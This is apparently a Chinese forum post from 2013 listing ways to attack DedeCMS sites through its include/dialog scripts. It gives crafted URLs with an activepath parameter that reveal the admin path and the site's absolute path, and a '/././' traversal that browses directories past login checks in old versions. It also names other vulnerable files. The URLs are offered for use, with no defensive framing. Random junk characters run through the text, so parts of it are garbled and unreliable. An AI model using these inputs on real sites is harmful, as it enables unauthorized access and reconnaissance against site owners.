1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理6 L0 U4 L* q$ s* a* ]
8 y9 A5 {/ i# q& {. h+ g
员帐号,新版本的就直接转向了后台.
( S3 Q0 @ ~# q. u! ?- x; k- A( f
2.include/dialog/config.php会爆出后台管理路径, f% U! P1 c8 l5 J
7 ^ ^1 y% Z' L7 M3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
' a1 ^$ C4 Z6 m# ~: J1 H) q) f1 v% ^8 u* [! P
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.7 T5 L7 R2 I# ?- @# d
2 } r% F, a8 r$ A: i( H+ Y' U
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉, a# e7 ?7 F$ O9 J# i. V7 B; [: o
2 }( P) x/ H2 r8 E* [2 o" u, L
到根目录去.不过这些版本的访问地址有些不同.' |. a8 U7 h# V
地址为require/dialog/select_soft.php?activepath=/././././././././: z5 i. B8 u& _. @/ B' Q4 c
M( f& ~5 O1 x4 `; W) S `include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
, m: F, b4 Z6 H i3 x! I2 I- R存在相同问题的文件还有
4 {0 d- f8 T1 C" Binclude\dialog\select_images.php
( V6 Z3 @* \ |include\dialog\select_media.php
: A! m. _; g! X$ }, Rinclude\dialog\select_templets.php! c% n( S( a- W" u- d1 Z
|
发表于 2013-4-16 16:50:43
收藏
支持
反对